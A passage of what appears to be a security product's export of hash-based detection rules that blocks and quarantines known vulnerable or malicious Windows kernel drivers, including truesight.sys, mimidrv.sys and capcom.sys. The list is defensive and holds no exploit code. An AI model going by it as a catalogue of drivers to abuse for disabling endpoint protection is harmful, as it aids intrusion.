"Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "f766690b-c9e3-556e-9f77-62129427bfb2", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.497856Z", + "creation_date": 
"2026-03-23T11:45:31.497858Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.497863Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "227ef6cf7a61cb7b8565ba6581a619d79030a45c4bec699867a502e2677dbe30", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "f777be10-23b0-50ef-bbb1-4bd4c0f5128c", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.465738Z", + "creation_date": "2026-03-23T11:45:30.465741Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.465750Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "1ef7afea0cf2ef246ade6606ef8b7195de9cd7a3cd7570bff90ba1e2422276f6", + "comment": "Malicious Kernel Driver (aka mimidrv.sys) [https://www.loldrivers.io/drivers/87752fb8-e9f6-4235-91e2-c4343677d817/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "f77c70f9-03fd-51d9-a7a4-7ff6d67dc19b", + 
"test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.153015Z", + "creation_date": "2026-03-23T11:45:31.153018Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.153026Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "8f0e38e7cad0e0226e2ce25db1dda0fbfe0628222a382a19d5d712005bca4bef", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "f781b720-3f52-5d04-ba84-fc30e648b03d", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.610083Z", + "creation_date": "2026-03-23T11:45:29.610089Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": 
"2026-03-23T11:45:29.610094Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "1f4d4db4abe26e765a33afb2501ac134d14cadeaa74ae8a0fae420e4ecf58e0c", + "comment": "CPUID CPU-Z vulnerable driver (aka cpuz143_x64.sys) [CVE-2017-15302] [https://www.loldrivers.io/drivers/de003542-80e1-4aa0-9b99-ed8647a93a6e/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "f782cccb-39d8-5245-95f0-2707bfefb998", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.826882Z", + "creation_date": "2026-03-23T11:45:30.826885Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.826890Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "0bf6291bee1862214a4c2948479e6e2c9c09d7d103e9e5ca35eea5726b789e07", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "f789a629-0ca7-539f-8b19-d7ef41f7e966", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + 
"rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.476997Z", + "creation_date": "2026-03-23T11:45:30.477000Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.477009Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "e03d8492926408a299100ef02c46bf3510a816bd9eed2f988b47c066049e9111", + "comment": "Vulnerable Kernel Driver (aka libnicm.sys) [https://www.loldrivers.io/drivers/2b949a0d-939f-456a-a34f-4589d7712227/] [authentihash SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "f7907a3e-4c74-52d4-b156-9c3d75463fa0", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.492338Z", + "creation_date": "2026-03-23T11:45:31.492340Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.492345Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": 
"42527d104eac6fb21d4cb6f7f1a8d10601044127de67ac5a8832ef0266fe367b", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "f791b45a-b7d3-5fcb-8223-47f0f5ccdd50", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.462820Z", + "creation_date": "2026-03-23T11:45:30.462823Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.462832Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "4bd4715d2a7af627da11513e32fab925c872babebdb7ff5675a75815fbf95021", + "comment": "Malicious Kernel Driver (aka mimidrv.sys) [https://www.loldrivers.io/drivers/87752fb8-e9f6-4235-91e2-c4343677d817/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "f79928f0-a5ab-562f-8d13-447fed687fb6", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" 
+ }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.825854Z", + "creation_date": "2026-03-23T11:45:31.825856Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.825861Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "d56c12e9ced5e3fe9902156bf265aaef933b206828f4fe72be7b675806c637fd", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "f7aa33e5-d64d-5aa1-a58d-3fbed87cecbd", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.498865Z", + "creation_date": "2026-03-23T11:45:31.498885Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.498895Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "5b4ef60abd1adf6909a91cce9bb505635921b9e6e3cb8857dea192f42f70b03b", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) 
[https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "f7acc85a-de2c-56fd-8b34-d4176c9f4d70", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.491795Z", + "creation_date": "2026-03-23T11:45:31.491798Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.491803Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "ea5be436504210daeae063b6ce4c17de5710dcd725dc8c798bbb6011202d6980", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "f7bb5d03-3180-5b1c-a92f-f0e8c16bab94", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.834297Z", + "creation_date": 
"2026-03-23T11:45:30.834301Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.834310Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "e72e3d969c429cf4c55a476751eec576c0388c681ff182ff629a812753011dae", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "f7bd01f5-fae7-5d4d-95ce-cf7bd36e331a", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.978791Z", + "creation_date": "2026-03-23T11:45:29.978793Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:29.978798Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "59b09bd69923c0b3de3239e73205b1846a5f69043546d471b259887bb141d879", + "comment": "Vulnerable Kernel Driver (aka procexp152.sys) [https://www.loldrivers.io/drivers/0567c6c4-282f-406f-9369-7f876b899c25/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "f7c5c863-a9fb-59ba-993d-67435828a444", + 
"test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.160474Z", + "creation_date": "2026-03-23T11:45:31.160475Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.160481Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "d13feffd9425aa1bf1cb196dd887e20f1dc46ef865584b5104595e77e71ff5c5", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "f7dcf992-df20-5f88-9bd7-3f6c369d2abf", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.606978Z", + "creation_date": "2026-03-23T11:45:29.606980Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": 
"2026-03-23T11:45:29.606985Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "76adb3fa346058e95ba3fd549fd48a15adaf4920a3109391f52053ebf39e62cc", + "comment": "Process Explorer driver (aka PROCEXP.SYS and PROCEXP152.SYS) [https://learn.microsoft.com/en-us/sysinternals/downloads/process-explorer] [authentihash SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "f7e088a2-9d52-5c42-98b4-d5beef625660", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.983667Z", + "creation_date": "2026-03-23T11:45:29.983670Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:29.983675Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "e4dbc382c21b4b14b54d37b2fd86e12a7637f177ba4170e19ffde3584ec48e6c", + "comment": "Vulnerable Kernel Driver (aka amigendrv64.sys) [https://www.loldrivers.io/drivers/5c45ae9e-cb6f-4eab-a070-b0187202e080/] [authentihash SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "f7e256cb-237e-5086-8d72-f1649adf06af", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + 
"rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.159972Z", + "creation_date": "2026-03-23T11:45:31.159974Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.159980Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "e2268ddada0ea19902baa3b63b6912526d6217b1dd26e651208d0952439f2884", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "f7e6dd6b-f24c-5070-801e-a72a8291549d", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.491521Z", + "creation_date": "2026-03-23T11:45:31.491524Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.491532Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": 
"ee277d77ba18e32ba094970f48b1e1d295a5c5f07a9a029dff6ad171dd5becb4", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "f7e942f1-ba4b-5f0a-94d5-1f5cab2ceffa", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.821897Z", + "creation_date": "2026-03-23T11:45:30.821901Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.821909Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "de8a750317ff44704c0b03c374f5cbc37c9ef5c067a33628aa7c51a5b11db383", + "comment": "Vulnerable Kernel Driver (aka ComputerZ.Sys) [https://blogs.vmware.com/security/2023/10/hunting-vulnerable-kernel-drivers.html] [authentihash SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "f7f56acb-6216-5897-9b9c-ab710b3baa83", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": 
"system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.828167Z", + "creation_date": "2026-03-23T11:45:31.828169Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.828174Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "0506323a942dbf6d78bcc596fb20acdec525786636f3923e5c33178c5cf55cb0", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "f7f89e16-1b35-550a-bc81-f50fb0022f4a", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.821343Z", + "creation_date": "2026-03-23T11:45:31.821346Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.821354Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "feec5c399ca9bb94a0592ab773bad0132d97aeed873bcb47a0622ab53c5c81b0", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) 
[https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "f8057b07-a2ad-53c7-b92f-9e9b95f99857", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.160380Z", + "creation_date": "2026-03-23T11:45:31.160382Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.160390Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "136e3f4cf24fef00f5b7a4d35b6970dff68e4c5af40f47c0fa0d2e36f90b5d73", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "f8061f08-9589-546e-bd8e-3617d60414ae", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.479828Z", + "creation_date": 
"2026-03-23T11:45:30.479830Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.479835Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "d9e8be11a19699903016f39f95c9c5bf1a39774ecea73670f2c3ed5385ebfe4c", + "comment": "Vulnerable Kernel Driver (aka capcom.sys) [https://www.loldrivers.io/drivers/b51c441a-12c7-407d-9517-559cc0030cf6/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "f80c9f39-bf9f-5c93-8902-cb4d04b3a541", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.604148Z", + "creation_date": "2026-03-23T11:45:29.604151Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:29.604156Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "8483c5dc2323306d4ee3685b7e90a4c11e11b01d04cb607e0bc5aad368fd3c6e", + "comment": "Vulnerable Kernel Driver (aka BEDAISY.SYS) [https://www.loldrivers.io/drivers/db666d40-c9fa-4039-bfac-a5d7afd61b67/] [authentihash SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "f821a02e-72e7-5e8f-93cd-e47306221281", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + 
